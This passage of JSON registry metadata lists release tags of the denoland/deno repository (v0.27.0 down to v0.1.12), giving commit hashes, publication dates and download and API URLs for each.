2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v